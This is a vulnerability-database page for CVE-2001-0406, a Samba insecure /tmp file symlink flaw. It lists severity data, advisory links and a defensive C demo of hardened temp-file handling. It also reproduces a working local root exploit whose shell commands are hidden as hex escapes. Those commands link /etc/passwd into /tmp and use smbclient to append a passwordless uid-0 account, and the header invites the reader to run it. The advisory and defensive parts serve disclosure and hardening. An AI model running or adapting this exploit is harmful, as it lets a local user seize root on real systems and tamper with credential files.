CVE-2001-0406
CVSS 2.1
Published: 2001-07-02 00:00:00
Revised: 2008-09-05 16:24:01

[Original] Samba before 2.2.0 allows local attackers to overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.


[CNNVD] Samba Insecure TMP File Symbolic Link Vulnerability (CNNVD-200107-042)

        Samba versions before 2.2.0 are affected. A local attacker can overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0406
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0406
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-042
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/670568
(UNKNOWN)  CERT-VN  VU#670568
http://www.debian.org/security/2001/dsa-048
(VENDOR_ADVISORY)  DEBIAN  DSA-048
http://www.caldera.com/support/security/advisories/CSSA-2001-015.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2001-015.0
http://archives.neohapsis.com/archives/bugtraq/2001-04/0326.html
(VENDOR_ADVISORY)  BUGTRAQ  20010418 PROGENY-SA-2001-05: Samba /tmp vulnerabilities
http://archives.neohapsis.com/archives/bugtraq/2001-04/0319.html
(VENDOR_ADVISORY)  BUGTRAQ  20010418 TSLSA-#2001-0005 - samba
http://archives.neohapsis.com/archives/bugtraq/2001-04/0305.html
(VENDOR_ADVISORY)  BUGTRAQ  20010417 Samba 2.0.8 security fix
http://www.securityfocus.com/bid/2617
(UNKNOWN)  BID  2617
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-040.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:040
http://archives.neohapsis.com/archives/freebsd/2001-04/0608.html
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:36
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000395
(UNKNOWN)  CONECTIVA  CLA-2001:395

- Vulnerability information

Samba Insecure TMP File Symbolic Link Vulnerability
Low severity  Access validation error
2001-07-02 00:00:00 2005-10-20 00:00:00
Local
        Samba versions before 2.2.0 are affected. A local attacker can overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.

- Advisories and patches

        Available fixes:
        HP CIFS/9000 Server A.01.06
        Samba Samba 2.0.4
        Samba Samba 2.0.5
        Samba Samba 2.0.6
        Samba Samba 2.0.7

- Vulnerability information (20776)

Samba 2.0.x Insecure TMP file Symbolic Link Vulnerability (EDBID:20776)
linux local
2001-04-17 Verified
0 Gabriel Maggiotti
N/A
source: http://www.securityfocus.com/bid/2617/info

Samba is a flexible file sharing package maintained by the Samba development group. It provides interoperability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 
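The insecure-creation pattern the description above turns on, shown from the defender's side as an added example (this is not code from the advisory, from SecurityFocus or from Samba): a predictable file name in /tmp opened with O_CREAT|O_TRUNC follows a symlink that another local user has planted there, while the same open with O_EXCL|O_NOFOLLOW, or a name chosen by mkstemp(), refuses the link. The scratch directory created with mkdtemp() and the file names victim.txt and x.log are constructed for the demonstration.

```c
/* Added defensive example, not part of the original record or of Samba.
 * Feature macros first so mkdtemp/O_NOFOLLOW/lstat are declared in strict modes. */
#define _DEFAULT_SOURCE
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: fixed name, no O_EXCL, symlinks followed, target truncated. */
int open_tmp_insecure(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_EXCL fails with EEXIST if anything (a symlink included) already
 * sits at path; O_NOFOLLOW fails with ELOOP on a symlink even without O_EXCL. */
int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred: let mkstemp() pick an unpredictable name and open it with O_EXCL. */
int open_tmp_unpredictable(const char *dir, char *out, size_t outlen)
{
    if (snprintf(out, outlen, "%s/samba.XXXXXX", dir) >= (int)outlen)
        return -1;
    return mkstemp(out);
}

/* Returns 1 if path is a symbolic link, 0 otherwise (lstat does not follow). */
int is_symlink(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0 && S_ISLNK(st.st_mode);
}

/* Plays the planted-link scenario against each opener. Returns 1 when the
 * insecure open clobbered the victim and both hardened variants behaved,
 * 0 when any of them did not, -1 on a setup error. */
int demo(void)
{
    char dir[] = "/tmp/symlinkdemo.XXXXXX";   /* constructed scratch location */
    char victim[4096], link[4096], fresh[4096];
    struct stat st;
    int fd, clobbered = 0, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/x.log", dir);

    /* Victim file with known contents, then a link at the predictable name. */
    FILE *f = fopen(victim, "w");
    if (f == NULL)
        return -1;
    fputs("original contents\n", f);
    fclose(f);
    if (symlink(victim, link) != 0)
        return -1;

    /* The insecure open follows x.log to victim.txt and truncates it. */
    fd = open_tmp_insecure(link);
    if (fd >= 0) {
        if (write(fd, "x", 1) != 1)
            return -1;
        close(fd);
        clobbered = stat(victim, &st) == 0 && st.st_size == 1;
    }

    /* The hardened open refuses the planted link outright. */
    fd = open_tmp_safe(link);
    int refused = fd < 0 && (errno == EEXIST || errno == ELOOP);
    if (fd >= 0)
        close(fd);

    /* mkstemp yields a real file, never a link, at a name nobody could pre-plant. */
    fd = open_tmp_unpredictable(dir, fresh, sizeof fresh);
    int fresh_ok = fd >= 0 && !is_symlink(fresh);
    if (fd >= 0) {
        close(fd);
        unlink(fresh);
    }

    result = is_symlink(link) && clobbered && refused && fresh_ok;
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return result;
}
```

demo() returns 1 when the insecure open truncated the link target and both hardened variants declined to follow it. For a daemon that writes per-user output into a shared directory, the equivalent fix is to stop using fixed names there at all, or to write under a per-process directory created with mkdtemp() and mode 0700, so that no other local user can pre-create the path.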

/*
 * Samba Server r00t exploit
 *
 * Scope: Local (this exploit) and posible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 *
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 *
 * Author:      Gabriel Maggiotti
 * Email:       gmaggiot@ciudad.com.ar
 * Webpage:     http://qb0x.net
 */


#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <string.h>

int main(int argc, char *argv[])
{
        /* Shell command strings stored as hex escapes. inject1 and inject2
         * set up the /tmp link; inject3a is the smbclient invocation, completed
         * below with the user name from argv[1] followed by inject3b. */
        char inject1[] =
                "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
                "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
        char inject2[] =
                "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
                "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
                "\x70\x2f\x78\x2e\x6c\x6f\x67";
        /* Sized so the two strcat() calls below cannot run past the end. */
        char inject3a[256] =
                "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
                "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
                "\x68\x6f\x73\x74\x2f\x22\xa\xa";
        char inject3b[] =
                "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
                "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
                "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
                "\x4e\xa";

        if (argc != 2) {
                fprintf(stderr, "usage: %s <user>\n", *argv);
                return 1;
        }
        /* The original appended argv[1] unchecked into a 100-byte buffer. */
        if (strlen(inject3a) + strlen(argv[1]) + strlen(inject3b) >= sizeof inject3a) {
                fprintf(stderr, "user name too long\n");
                return 1;
        }
        strcat(inject3a, argv[1]);
        strcat(inject3a, inject3b);
        /* system() takes one argument; the original passed a spurious second one. */
        system(inject1);
        system(inject2);
        system(inject3a);

        return 0;
}

- Vulnerability information

13870
Samba Printer Queue Query Symlink Arbitrary File Overwrite
Local Access Required Race Condition

- Vulnerability description

Unknown or Incomplete

- Timeline

2001-04-17 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete